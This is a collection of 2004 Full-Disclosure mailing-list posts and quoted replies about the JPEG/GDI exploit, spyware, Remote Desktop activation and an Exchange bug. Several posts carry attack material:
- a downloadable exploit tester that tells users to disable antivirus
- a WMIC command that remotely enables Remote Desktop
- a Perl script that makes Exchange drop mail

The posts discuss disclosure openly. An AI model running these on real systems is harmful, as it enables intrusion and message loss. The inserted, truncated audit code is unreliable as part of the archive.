|about that in the original email. (Others have written me 
|asking the same question.) I only provided it to possibly 
|help others who have lots of friends asking them for help to 
|patch their systems. This simply sees if they are 
|vulnerable, then leads them through the steps to patch the 
|system if they are. (You may have to tell them to ignore AV 
|warnings, or disable the AV scanner. Again, I urge you to 
|test this on a NON-PRODUCTION machine first. See what it 
|contains, read the batch files, see what it downloads, etc.)
|
|Please feel free to ask me any questions. Hope it helps someone else.
|
|--
|Peace. ~G
|
|
|On Wed, 6 Oct 2004 20:59:28 -0500, RandallM 
|[EMAIL PROTECTED] wrote:
| 
| |--__--__--
| |
| |Message: 14
| |Date: Wed, 6 Oct 2004 15:53:32 -0700
| |From: GuidoZ [EMAIL PROTECTED]
| |Reply-To: GuidoZ [EMAIL PROTECTED]
| |To: [EMAIL PROTECTED]
| |Subject: [Full-Disclosure] Quick JPEG/GDI test & fix (timesaver)
| |
| |Hello list,
| |
| |I wrote a very simple program/batch file that tests for the JPEG
| |exploit, then if affected, provides instructions on how to patch the
| |exploit. It has been tested on my own lil happy lab network, as well
| |as on one network where I'm a sysadmin. (Tested on Windows XP Home
| |and Pro, SP1a and SP2.)
| |
| |It DOES test for the exploit by attempting to use an infected JPG
| |which downloads the instructions for fixing it, if exploited. By
| |viewing the strings in the JPG, you can see the file it downloads and
| |check it out for yourself. It's clean. =) Just contains a batch file
| |and a program to launch the batch file. (The file that gets downloaded
| |is a simple SFX.) Links are below. It contains a warning saying it's
| |about to try to exploit the system and to save data in open programs.
| |(It also warns that Explorer may crash.)
| |
| |I wrote this merely to save myself time and allow friends/family to
| |test their own systems, then patch them without having to call me for
| |help. It's not been tested in every environment and in every scenario.
| |If you find a problem, feel free to email me (exploit _AT_ guidoz
| |_DOT_ com). Obviously I'm not responsible if it's abused somehow, or if
| |it breaks something, etc. Feel free to modify it to suit your own
| |needs, but use it at your own risk.
| |
| |Test can be downloaded from here:
| |http://www.guidoz.com/exploit-test.exe
| |
| |Again, it's just an SFX archive with a batch file. Hopefully it will
| |save someone else some time. I've used it to have friends/family (and
| |a few clients) patch a total of around 30 machines without problems.
| |
| |--
| |Peace. ~G
| |
| |
| |--__--__--
| |
| |End of Full-Disclosure Digest
| |
| 
| Well, guess I'm safe. McAfee saw it as Exploit-MntRedir.gen and said...NO!
| I googled it and it found nothing though. Thought it would at least 
| lead me to McAfee. McAfee search said:
| 
| We found no records matching the following criteria:
| Virus name containing MntRedir.gen.
| Please try narrowing your search by using fewer characters.
| 
| What gives?
| 
| thank you
| Randall M
| 
|
|



[Full-Disclosure] Symantec Security Report 1V

2004-10-07 Thread RandallM
http://www.securityfocus.com/columnists/271
 
Very interesting and yet kinda scary! Symantec gave their view on the trend
of internet attacks. I'd be very interested in the views from this list.
There is one area that is starting to concern me at my place of employment
and that is IMs. I delete them and the next day they're back. What I need
is some POC to show the bosses concerning the vulnerabilities associated
with them. Which I believe is a trend that will increase greatly.
 
thank you
Randall M
 



[Full-Disclosure] House approves spyware legislation

2004-10-06 Thread RandallM
  

The U.S. House of Representatives voted late Tuesday to restrict some of the
most deceptive forms of spyware. 

By a 399-1 vote, House members approved legislation prohibiting taking
control of a computer, surreptitiously modifying a Web browser's home page,
or disabling antivirus software without proper authorization. 

http://news.com.com/House+approves+spyware+legislation/2100-1028_3-5397822.html?tag=nefd.top

 
thank you
Randall M
 



Re: [Full-Disclosure] House approves spyware legislation

2004-10-06 Thread RandallM



|On Wed, 6 Oct 2004 05:03:45 -0700, Gregory Gilliss 
|[EMAIL PROTECTED] wrote:
| Great, Not that I'm any fan of spyware, but this is just 
|another law 
| against hacking. Think - what's the difference between this and 
| someone using XSS to take control of a computer? If you 
|r00t a box 
| and deface the home page, then you've broken this law.
| 
| sigh Instead of fixing the problem (poor software 
|security) we pass 
| laws to punish the people who do the things that 
|illustrate the problem.
| Basic philosophical differences, blah blah blah ...
| 
| Worst of all, do you really think that the spyware rackets 
|will slow 
| down or cease because of this? Nope - they'll just migrate 
|out of the jurisdiction.
| 
| -- Greg
|End of Full-Disclosure Digest
|


I guess one has to decide if browser hijacking is not the taking of personal
property. I for one do not find it amusing to open my browser and find it has
been redirected to a hijacked page as my new Homepage!
If this law would allow me...the user to bring down hell upon these people
then I'm all for it.



[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs

2004-10-06 Thread RandallM

|--__--__--
|
|Message: 14
|Date: Wed, 6 Oct 2004 15:53:32 -0700
|From: GuidoZ [EMAIL PROTECTED]
|Reply-To: GuidoZ [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Quick JPEG/GDI test & fix (timesaver)
|
|Hello list,
|
|I wrote a very simple program/batch file that tests for the JPEG
|exploit, then if affected, provides instructions on how to patch the
|exploit. It has been tested on my own lil happy lab network, as well
|as on one network where I'm a sysadmin. (Tested on Windows XP Home
|and Pro, SP1a and SP2.)
|
|It DOES test for the exploit by attempting to use an infected JPG
|which downloads the instructions for fixing it, if exploited. By
|viewing the strings in the JPG, you can see the file it downloads and
|check it out for yourself. It's clean. =) Just contains a batch file
|and a program to launch the batch file. (The file that gets 
|downloaded
|is a simple SFX.) Links are below. It contains a warning saying it's
|about to try to exploit the system and to save data in open programs.
|(It also warns that Explorer may crash.)
|
|I wrote this merely to save myself time and allow friends/family to
|test their own systems, then patch them without having to call me for
|help. It's not been tested in every environment and in every 
|scenario.
|If you find a problem, feel free to email me (exploit _AT_ guidoz
|_DOT_ com) Obviously I'm not responsible if it's abused 
|somehow, or if
|it breaks something, etc. Feel free to modify it to suit your own
|needs, but use it at your own risk.
|
|Test can be downloaded from here: 
|http://www.guidoz.com/exploit-test.exe
|
|Again, it's just an SFX archive with a batch file. Hopefully it will
|save someone else some time. I've used it to have friends/family (and
|a few clients) patch a total of around 30 machines without problems.
|
|--
|Peace. ~G
|
|
|--__--__--
|
|End of Full-Disclosure Digest
|

Well, guess I'm safe. McAfee saw it as Exploit-MntRedir.gen and said...NO!
I googled it and it found nothing though. Thought it would at least lead me
to McAfee. McAfee search said: 

We found no records matching the following criteria:
Virus name containing MntRedir.gen.
Please try narrowing your search by using fewer characters.

What gives?

thank you
Randall M



RE:[Full-Disclosure] XP Remote Desktop Remote Activation

2004-10-02 Thread RandallM
Would access to a command shell be accomplished via the recent ZoneID hole if
such Administrator password access is not available? Or perhaps even with the
launching of the MS04-028 exploit? Of course any Terminal usage on home PCs is
noticed because users are locked out. Now terminal servers are a different
story but user intervention is still needed.

thank you
Randall M
 
 

|--__--__--
|
|Message: 3
|Date: Fri, 1 Oct 2004 23:50:45 -0500
|From: Fixer [EMAIL PROTECTED]
|Reply-To: Fixer [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
|
|--=_Part_505_31077403.1096692645033
|Content-Type: text/plain; charset=US-ASCII
|Content-Transfer-Encoding: 7bit
|Content-Disposition: inline
|
|XP Remote Desktop Remote Activation
|
|
|Information
|
|Windows XP Professional provides a service called Remote Desktop,
|which allows a user to remotely control the desktop as if he or she
|were in front of the system locally (ala VNC, pcAnywhere, etc.).
|
|By default, Remote Desktop is shipped with this service 
|turned off and
|only the Administrator is allowed access to this service.  It is
|possible, however, to modify a series of registry keys that may allow
|a malicious user who has already gained a command shell to activate
|Remote Desktop and add a user they have created for 
|themselves as well
|as to hide that user so that it will not show up as a user in the
|Remote Desktop user list.  The instructions for this are attached. 
|Additionally, I have listed a sample .reg file of the type that is
|discussed in the instructions below.
|_
|

SNIP

|--__--__--
|
|Message: 6
|From: Dominick Baier [EMAIL PROTECTED]
|To: 'Fixer' [EMAIL PROTECTED], 
|[EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation
|Date: Sat, 2 Oct 2004 17:43:11 +0200
|
|if you have an administrator password for the machine you 
|can just use WMIC
|to turn remote desktop on.
|
|wmic /NODE:Server /USER:administrator RDTOGGLE WHERE 
|ServerName=Server
|CALL SetAllowTSConnections 1
|
|End of Full-Disclosure Digest
|

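As an added defender-side example (not code from Fixer's or Dominick's posts), here is a PowerShell audit that reads the same Remote Desktop setting the WMIC RDTOGGLE alias toggles and lists the local groups that grant Remote Desktop logon, so a quietly enabled Remote Desktop or an added account shows up in a report. The host names are placeholders, and it assumes WMI and ADSI (DCOM/RPC) access to the audited machines.

```powershell
# Added example (not from the original posts): audit Remote Desktop state
# and the local groups that grant Remote Desktop logon on a list of hosts.
# Host names below are placeholders; replace them with your own inventory.
$hosts = @('WORKSTATION-01', 'WORKSTATION-02')

function Get-RdpAuditRecord {
    param([string]$ComputerName)

    # Win32_TerminalServiceSetting is the class behind the WMIC RDTOGGLE alias.
    # Vista and later expose it under root\cimv2\TerminalServices; XP/2003 under root\cimv2.
    $setting = $null
    foreach ($ns in @('root\cimv2\TerminalServices', 'root\cimv2')) {
        try {
            $setting = Get-WmiObject -Namespace $ns -Class Win32_TerminalServiceSetting `
                -ComputerName $ComputerName -ErrorAction Stop
            if ($setting) { break }
        } catch { }
    }

    # Enumerate the two local groups whose members may log on via Remote Desktop.
    # Reading the group through ADSI lists every member account, including one that
    # has been hidden from the logon screen or the Remote Desktop user list.
    $members = @{}
    foreach ($group in @('Administrators', 'Remote Desktop Users')) {
        try {
            $adsiGroup = [ADSI]"WinNT://$ComputerName/$group,group"
            $members[$group] = @($adsiGroup.Invoke('Members') | ForEach-Object {
                $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
            })
        } catch {
            $members[$group] = @("<error: $($_.Exception.Message)>")
        }
    }

    [pscustomobject]@{
        ComputerName       = $ComputerName
        RdpEnabled         = if ($setting) { [bool]$setting.AllowTSConnections } else { $null }
        Administrators     = $members['Administrators'] -join ', '
        RemoteDesktopUsers = $members['Remote Desktop Users'] -join ', '
    }
}

$records = foreach ($h in $hosts) { Get-RdpAuditRecord -ComputerName $h }
$records | Format-Table -AutoSize

# Flag hosts where Remote Desktop is on; compare the listed members against your baseline.
$records | Where-Object { $_.RdpEnabled -eq $true } | ForEach-Object {
    Write-Warning "Remote Desktop is enabled on $($_.ComputerName); verify its group members."
}
```

Run it from an account with administrative rights on the audited hosts; a host that reports RdpEnabled as blank could not be queried over WMI at all and deserves a look of its own.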


[Full-Disclosure] RE: horse before cart...I take it back

2004-09-30 Thread RandallM
Sorry for my stupidity and too quick response. After careful study I see it's
the .DLL only. This exploit has me too excited! I am impressed though with
how quick the response to this has been. I have heard of few incidents. My
own ISP has finally implemented protection even from those files received
from the list. Personally I know of a high school here in Missouri that had
to shut down internet access due to this, so they claim.
 
thank you
Randall M
 



[Full-Disclosure] WinXP Application Layer Gateway Service

2004-09-28 Thread RandallM
Is there anything fishy about this service performing background FTP
request?
 
thank you
Randall M
 
 



RE:[Full-Disclosure] How to obtain hostname lists

2004-09-28 Thread RandallM
Fab,
One kewl way is to open a website like Nakedladies.com and log all the
visiting IP's!
Kewl huh! Do you need someone to write some code also?

thank you
Randall M
 
 

|--__--__--
|
|Message: 4
|Date: Tue, 28 Sep 2004 09:32:37 -0600
|From: fabio [EMAIL PROTECTED]
|To: Full-Disclosure [EMAIL PROTECTED]
|Subject: [Full-Disclosure] How to obtain hostname lists
|
|Hi.
|
|I would like to know what techniques intruders can use to 
|obtain a list of hostnames and attack them with exploit code?
|For example, a huge list like:
|www.foo.com
|www.bar.com
|
|And so on. Also, they can have lists with certain criteria 
|in common (os, httpdver) and do a more selective attack. I 
|want to know how they can obtain hostnames and create a 
|huge database of potential host victims?
|
|Thanks in advance.



[Full-Disclosure] Need layman terms for jpeg exploit

2004-09-28 Thread RandallM
Would some kind soul explain the total workings of the exploit in layman
terms? Things like how it is used, how the user is exploited, what's common
about the jpeg code that must be used, etc., etc.
 
thank you in advance
Randall M
 



[Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?

2004-09-26 Thread RandallM

What exactly would one gain by creating a PoC on this exploit?
How exactly does this compare to meaningful disclosures that were
revealed because someone would not listen or ignored the warnings
of their security vulnerability.

I mean, this is nothing like a program goof that allows clear-text
passwords or exposes files or the like. This exploit (if it can be
called that) took a lot of thought to create it and exploit it.

Correct me if I'm wrong but it does not fall in to the category
of exploit as defined by this list. This was truly a created Exploit 
that would not be there otherwise. This took intelligent input.

This is nothing more than a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.

|--__--__--
|
|Message: 13
|From: i.t  [EMAIL PROTECTED]
|Organization: i.t consulting
|To: [EMAIL PROTECTED]
|Date: Sun, 26 Sep 2004 11:57:33 +0200
|Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
|
|
| On Saturday 25 September 2004 16:59, raza wrote:
|  I just compiled this and it works well..
| 
| ...
| yes and it works very well.
|  I can see this ones gaana be fun...
| We'll have a worm within days.

|
|for nearly all of my clients using win xp I've deinstalled 
|win messenger.
|one urgently wanted it back for communicating in real-time; 
|and, of course, 
|it's much more fun seeing a live picture of the 
|counterpart(s) in the chat 
|window...
|
|even having installed sp2 and the newest patches plus AV I 
|can imagine a virus 
|spreading within those pictures throughout the whole msn and so on...
|any other defense?
|or is this too much paranoia?
|
|i.t
|
|
|--__--__--



[Full-Disclosure] [Full Disclosure] *HACKERS COSTING ENTERPRISES BILLIONS

2004-09-20 Thread RandallM
 

A report issued by Symantec found that:

The average time period between the disclosure of a vulnerability and its
first exploit by hackers collapsed from several weeks in past reports to
less than six days in the first half of 2004.

'In some cases, we saw global exploits in less than two days,' said Weafer.
The current report finds that the vast majority of those vulnerabilities
were moderately to highly severe and nearly 40% were associated with Web
applications.

This and some other findings from its Internet Security Threat Report.
See Security Wire Perspectives, Vol. 6, No. 72, September 20, 2004 for this
and other related material.
 
thank you
Randall M
 



[Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access

2004-09-19 Thread RandallM
Gentlemen,
I'm a little lost now on the intent of the original post. I believe it was
intending to say that IBM computers arriving with XP installations have
blank default Administrator passwords. 

I install about three fresh installs of XP and four pre-installs on HP
laptops a week. The retail version always asks for a password for the
local Administrator account and a user name. XP pre-installations require
a user name and no mention of the Admin account though it's there by default
with no password. Both by default give the user local administrator
rights. Once installed I have to go to the accounts area and supply the
passwords. If I join these to the domain I must supply a password. I've done
it this way for two years and nothing has changed. 

It seems then the IBM and HP bypass what fresh retail installations do, and
that is allow the opportunity to supply a password for the local
administrator. This would be then their problem. Retail version warns but
allows blank passwords. This would be the XP problem.

I take full responsibility for any mistakes above. It's late. I'm tired and
doing so many it does become mind numbing. But I believe this is an accurate
account of the installations.
 
thank you
Randall M
 



Re: [Full-Disclosure] ZIP Attachment

2004-09-19 Thread RandallM
Nick, have some coffee, it'll be ok! :)
 
 
thank you
Randall M
 
--__--__--

Message: 10
Date: Sun, 19 Sep 2004 21:39:03 +1200
From: Nick FitzGerald [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] ZIP Attachment
To: [EMAIL PROTECTED]
Reply-to: [EMAIL PROTECTED]
Organization: Personal account

GuidoZ wrote:

 I'm well aware that a filename usually isn't a very useful tools when
blah, blah, blah...

Your first post was a total waste of bandwidth, this one doubly so. 
Your two minutes at Google were not worth the list's time and 
resources, yet after having the blindingly obvious pointed out to you, 
you had to compound that by posting a wacky justaficashun of your 
originally pointless message.

Regards,

Nick FitzGerald
 



[Full-Disclosure] Re: [Vmyths.com ALERT] Hysteria predicted for 'JPEG and windows update

2004-09-16 Thread RandallM
 
I'm curious if anyone else noticed that the patch to fix windows only
takes you to the SP2 update. We don't want the SP2 update because we have
not fully tested this against our office and accounting software. I tried on
three different machines and each time the windows update for critical or
custom only allowed me to get the SP2 update, nothing else. Did I read
wrong? Did they not issue a patch?
 
thank you
Randall M
 
 



[Full-Disclosure] (Full-disclosure) SP2 and McAfee. Has the final release been resolved?

2004-08-12 Thread RandallM
With the SP2 RC1 McAfee could not update dats. Framework could not start.
Had to set settings manually. 
Has this been fixed in the final version?
 
the settings:
 
To fix Virus scan 7.0
 
 *Run dcomcnfg from the DOS prompt
Select Component Services 
Select My Computer 
Open DCom config folder
Click no on the pop up dialog if it appears.
Select Framework Services 
Right click on properties and select Security tab. Change Launch to Use
default.
Click on Apply.
Close the windows
Run Update 
 
thank you
Randall M
 
 



[Full-Disclosure] FullDisclosure: CWS removal tools

2004-07-31 Thread RandallM
I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunately,
the author was a student and it seems he can no longer support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes obsolete.
I found one link that still works but not sure if it updates anymore:
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
are some other useful links: http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 



[Full-Disclosure] RE: Full-Disclosure antisemtism, -Steer it a bit back on topic-

2004-07-22 Thread RandallM
Maarten,all,

I might add that security is a big part of this subject considering
cyber-war being implemented from both sides. 

thank you
Randall M
 
 

|--__--__--
|
|Message: 6
|From: Maarten [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: Re: [Full-Disclosure] antisemtism, FD and bandwidth 
|- what I want out of it
|Date: Thu, 22 Jul 2004 14:03:20 +0200
|
|On Thursday 22 July 2004 13:07, Harlan Carvey wrote:
|
| Consider this...this is a public list and people will
| knowing post off-topic.  Sometimes they'll even say,
| hey, this is off topic.  Now, what would happen if
| you were sitting around having a couple of beers w/
| your buddies and a friend of yours walked up and just
| started talking about something that had nothing
| whatsoever to do with what you and your buds were
| talking about?  Would you be the one to do that to
| your friends?  How about a group of strangers?
|
|Except that in that social context you cannot really say there is no 
|moderation.  Moderation will not be official, sure, but body 
|language, 
|awkward looks and maybe a wisecrack or two will most of the 
|time quickly shut 
|up that person.  Or they will continue their conversation in 
|a smaller 
|circle, all things that are impossible or at least difficult 
|to do on a ML. 
|On a mailinglist you can continue off-list, but that is a one-to-one 
|conversation, not a fork like you can have in your bar scenario.
|Also, if the guy won't stop jabbing, you can all start to 
|leave and continue 
|elsewhere.  This doesn't happen on mailinglists, or at the 
|very least it is a 
|process that takes months to complete, instead of seconds.
|
|To steer a little bit back to on-topic, can we conclude that 
|all computer 
|systems in israel and the surrounding palestine territories 
|are insecure ?
|Because, since all real security begins with _physical_ 
|security, one can 
|easily argue that all those systems are notoriously insecure.  ;-)
|
|Maarten
|
|-- 
|Yes of course I'm sure it's the red cable. I 
|guarante[^%!/+)F#0c|'NO CARRIER
|



RE: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability

2004-07-03 Thread RandallM
So are there any problems or complications for enterprises when applying
this patch?
 
 
 
thank you
Randall M
 
 

Message: 3

Date: Fri, 02 Jul 2004 12:36:03 -0400

From: William Warren [EMAIL PROTECTED]

To: [EMAIL PROTECTED]

Subject: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability

http://support.microsoft.com/default.aspx?kbid=870669




[Full-Disclosure] Successful in blocking all known exploits

2004-07-03 Thread RandallM
After a number of years, much thought, and long nights I have developed a
systematic method to prevent and thwart exploits on my system!
 
NEVER REBOOT!
 
I have been up and running for 876 days straight and have had no problems to
date!
 
thank you
Randall M
 
 



[Full-Disclosure] Apology: Was Multiple Scanning Engines

2004-06-27 Thread RandallM
I do sincerely apologize for offending those who felt this was not the place
to ask such a question. I felt though that there was no better place than a
place where the recipients were of high caliber and knowledge. A Google search
would have only given me advertisements of the We're the best type. For those
who through kindness answered I thank you so much.

 

--__--__--

Message: 4
Date: Sun, 27 Jun 2004 11:29:38 +1200
From: Nick FitzGerald [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] multiple scanning engines
To: [EMAIL PROTECTED]
Reply-to: [EMAIL PROTECTED]
Organization: Personal account

RandallM [EMAIL PROTECTED] wrote:

 I'm looking for something that can utilize multiple scanning engines to
 place above our mail servers. Any suggestions?

Precisely how is this a security vulnerability disclosure issue?

Securityfocus has a focus-virus list and there are many other fora 
around the web for discussing whose antivirus is best type issues...

Please, no-one else reply to this _on list_.

-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

--__--__--

thank you
Randall M


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] multiple scanning engines

2004-06-26 Thread RandallM
Hi,

I'm looking for something that can utilize multiple scanning engines to place
above our mail servers. Any suggestions?

thank you
Randall M



[Full-Disclosure] RE: Full-Disclosure digest, SP2 Problems

2004-06-07 Thread RandallM


Jelmer made this really neat statement:
 
|--__--__--
|
|Message: 5
|Date: Mon, 07 Jun 2004 04:17:28 +0200
|From: Jelmer [EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary
|code
| (An analysis of the 180 Solutions Trojan)
|To: 'Chris Carlson' [EMAIL PROTECTED]
|Cc: [EMAIL PROTECTED]
|
|I haven't installed SP2 yet since I heard a lot of complaints from people
|who claimed it caused instability, it had memory management issues, some
|drivers didn't work, security measures a bit too much in your face etc
|
|But I reviewed the list of changes sometime back and I concur, it looks
|very
|promising, I think in the near future an IE exploit will be a rare
|occurrence as opposed to a bi weekly event
|
|End of Full-Disclosure Digest

My reply:

I have the sp2 after attending the Security Summit 2004. I loaded this on my
test laptop. Glad I did. I would have been very pissed if I had loaded it on
anything else.

First off, if you have McAfee or Norton you no longer are able to update
using auto. It for sure is for the home user. If you're expecting
something that you can have a little more control over this is not for you.
One thing that I was afraid of and concerned me due to my mobile users was
the ability to use VPN. It works well and does give you options to select
services for each connection you use.
It did not recognize my virus program being loaded nor give me the option to
point to it. I think that's due to the McAfee incompatibility in some way.

I did look for a fix and found this but haven't tried it yet:
__
The McAfee framework issue is solved easily.
Administrative Tools
Component Service
DCOM conf
Framework service
Right-click - properties
Set the launch and access permission to Default
Restart pc. McAfee will update properly.
Seems to be an error in the McAfee installer


Then of course there seems to be a slew of areas from web programs to a
warning from Microsoft that SP2 will break and disrupt existing
applications unless specific code rewrites are made at the developer end.
http://www.internetnews.com/ent-news/article.php/3322381 

I'll test the above for McAfee fix and see if that works.

Randall M



[Full-Disclosure] xabot or sdbot or spybot...

2004-06-04 Thread RandallM
--__--__--

Message: 21
Date: Fri, 04 Jun 2004 00:08:23 +0200
From: Axel Pettinger [EMAIL PROTECTED]
Organization: API
To: Perrymon, Josh L. [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] anyone seen this worm/trojan  before?

Perrymon, Josh L. wrote:
 
 I found this worm/ trojan on a laptop. Ran FPort and found the .exe.
 Doesn't look like it propagates to other machines but rather communicates
 with a compromised
 web companies server using IRC. The compromised server has removed the
IRC
 service. Only sends RST packets back.
 
snip
 I would like to know the attack vectors. I'm guessing LSASS.

AntiVirus scanners identify our trojan as:

BitDefender : Backdoor.SDBot.Gen
Kaspersky   : Backdoor.Rbot.gen
McAfee  : W32/Sdbot.worm.gen.g 
Symantec: W32.Spybot.Worm 
Trend Micro : WORM_SPYBOT.AP

From a quick look at the file I'd say the following is the best 
description of that trojan. There're several attack vectors ...

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT.AP&VSect=T

Regards,
Axel Pettinger



I'd like to throw something in here. While scanning with Spybot 1.3 it came
to a halt with an error. The error was an Xabot error. After many attempts to
figure this out I searched Xabot. This lead to Symantec's site
http://securityresponse.symantec.com/avcenter/venc/data/w32.xabot.worm.html
and http://www.sophos.com/virusinfo/analyses/w32sdbotna.html where it is
associated with Sdbot. 

Well, for sure I am having a hell of a time finding it as all conventional
means have failed. 3 online scans. 3 scans in safe mode. Hijack This,
Swat-it, Bazooka and still Spybot is halted with the error. I uninstalled
Spybot three times. It seems I have a remnant somewhere.

thank you
Randall M
 




[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1675 - 32 msgs

2004-05-28 Thread RandallM
Yo! Skylined, don't hold back, tell us how you really feel!

|Message: 30
|From: Berend-Jan Wever [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: Re: [Full-Disclosure] lists, autoresponders, and netiquette
|Date: Fri, 28 May 2004 03:42:40 +0200
|
|Every time I post to a list I get these out of office auto-responses.
|Can these responders be configured to not respond to stuff from a list?
|
|-Michael
|
|Yes, they can... and no, they won't. Too much shit-for-brains dumb-ass
|good-for-nothing mofo's on the list for that. Why the hell do you think
|every non-informative troll thread is replied to at least 30 times?
|That's
|just because there are more people subscribed that get a hard on from
|annoying people (or are just plain stupid) than there are that get a hard
|on
|from actually contributing something.
|
|As a matter of fact I'm just replying because my girlfriend broke up with
|me
|and I'm drunk, else I wouldn't even bother: I just felt like being a
|shit-for-brains dumb-ass good-for-nothing mofo.
|
|Cheer,
|SkyLined



[Full-Disclosure] Remember the subject about posting the exploit?

2004-05-21 Thread RandallM
Well, concerning the German Teenager who is responsible for releasing
sasser, Mitnick states:

 

He was no great technical expert. There was a published vulnerability and
he took his worm and used his exploit code to be able to propagate it in the
many systems that Sasser touched.  

 

http://www.zone-h.com/en/news/read/id=4245/ 

 

Just my point justified. A more protective measure must surely exist?

 

Like I said before, I play counter strike. The kids 12-18 years old on there
know c+ like the back of their hand and brag about which university their
bots got into that day and the number of bots they own.

 

thank you

Randall M

 

 




[Full-Disclosure] RE: Full-Disclosure New therad: sasser, costs, support etc alltogether

2004-05-14 Thread RandallM


QUESTION:

If a tree falls in the woods where no one is around to hear it does it make
a sound?

If there wasn't someone looking for bugs or exploits would there be any?


In a perfect world this list wouldn't exist.



[Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so lets post how

2004-05-12 Thread RandallM
I am using the following only as an example that has been slightly discussed
here. The gentleman rightly posts and gives us the information that is very
helpful to be aware of. But then posts the exploit example because, in his
own words, 

|I think some people know how to use this FEATURE ...  I hope this post
|will speed up the fix release!

Exactly in what way do you think this should speed up the release? 

Granted, this is a lost email exploit. But what if it was a dangerous
exploit? I have seen these also posted.

I know of script kiddies who would never be able to find the exploit but
are part of the group who know how to use this 'FEATURE'. They watch
here and others just for that purpose. Where is accountability? I am torn
between this issue of needed knowledge and exposed exploit. As a network
administrator I have no need for the exploit but for the knowledge. I have
found no better place than here for that. Then on the other hand you all
give out the exploits for confirmation, which is needed also. Just some of my
personal inward ramblings.

thank you
Randall M
 

|--__--__--
|
|Message: 20
|Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
|From: [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] MS Exchange message lost
|
|/* MS Exchange duplicate message fault (message lost)
|*
|* MS Exchange (all versions affected) duplicate message fault
|*
|* I discovered this bug independently on 10, 2003
|*
|* public post 05, 2004
|*
|* Helmut Schmitz  [EMAIL PROTECTED]
|*
|* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET -  */
|
|MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
|messages with long message ids (189 bytes?) to more than one recipient
|(cc), the message will not be delivered correctly ... there is no correct
|logging !!, the messages will be delivered to only one recipient ... the
|message to the other will be lost !!
|
|I have sent this issue to Microsoft (10.2003) ... some months later
|(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
|some reg settings fixes (workaround ;-) the problem.
|
|Perl Example (test exploit) ...
|
|#!/usr/bin/perl -w
|use Net::SMTP;
|$from = '[EMAIL PROTECTED]';
|$to = '[EMAIL PROTECTED]';
|$cc = '[EMAIL PROTECTED]';
|$subject = 'Test Email';
|# connect to the mail server and set the envelope sender and recipients
|$smtp = Net::SMTP->new('yourmailserver');
|$smtp->mail($from);
|$smtp->to($to);
|$smtp->cc($cc);
|$smtp->data();
|$smtp->datasend("To: $to\n");
|$smtp->datasend("Cc: $cc\n");
|$smtp->datasend("From: $from\n");
|$smtp->datasend("Subject: $subject\n");
|# the over-long Message-ID header is what triggers the fault
|$smtp->datasend("Message-ID: "
|  . "veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte"
|  . "ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng"
|  . "eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei"
|  . "feejktmhedgedherngrondljzhng \n");
|$smtp->datasend("Hallo\n");
|$smtp->datasend("123\n");
|$smtp->datasend("123\n");
|$smtp->datasend("123\n");
|$smtp->dataend();
|$smtp->quit;
|
|Background:
|Duplicate detection is decided by three factors.  These are MessageID,
|RootFID (the root folder ID of the mailbox) and the SubmitTime into the
|store.  These are used to build a unique key when the message is
|submitted.
|If all the factors are the same value, then we recognize the message as
|duplicate.
|
|###
|
|I think some people know how to use this FEATURE ...  I hope this post
|will speed up the fix release!
|
|Regards,
|Helmut Schmitz
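
As an added example (not code from Helmut's post, nor anything from Microsoft), a header check that a mail relay or log processor could run on messages before they reach an affected Exchange store: it unfolds the Message-ID header, measures it in bytes, counts To/Cc recipients, and flags messages that combine an over-long ID with more than one recipient, which is the combination the post describes. The 189-byte threshold is the post's own estimate and is only a default parameter; the sample messages are constructed here for testing.

```python
import email
import email.utils
from email import policy

# The post estimates the problematic Message-ID length at "189 bytes?"; treat it
# as a tunable threshold, not a documented Exchange limit.
DEFAULT_LIMIT = 189
SAMPLE_LONG_ID = "<" + "x" * 200 + "@example.test>"  # constructed: 215 bytes


def message_id_length(raw_message: bytes) -> int:
    """Length in bytes of the Message-ID value with header folding removed (0 if absent)."""
    msg = email.message_from_bytes(raw_message, policy=policy.compat32)
    value = msg.get("Message-ID")
    if value is None:
        return 0
    # compat32 keeps the original folding whitespace; a Message-ID never contains
    # whitespace itself, so dropping all of it measures the identifier alone
    return len("".join(value.split()).encode("utf-8"))


def recipient_count(raw_message: bytes) -> int:
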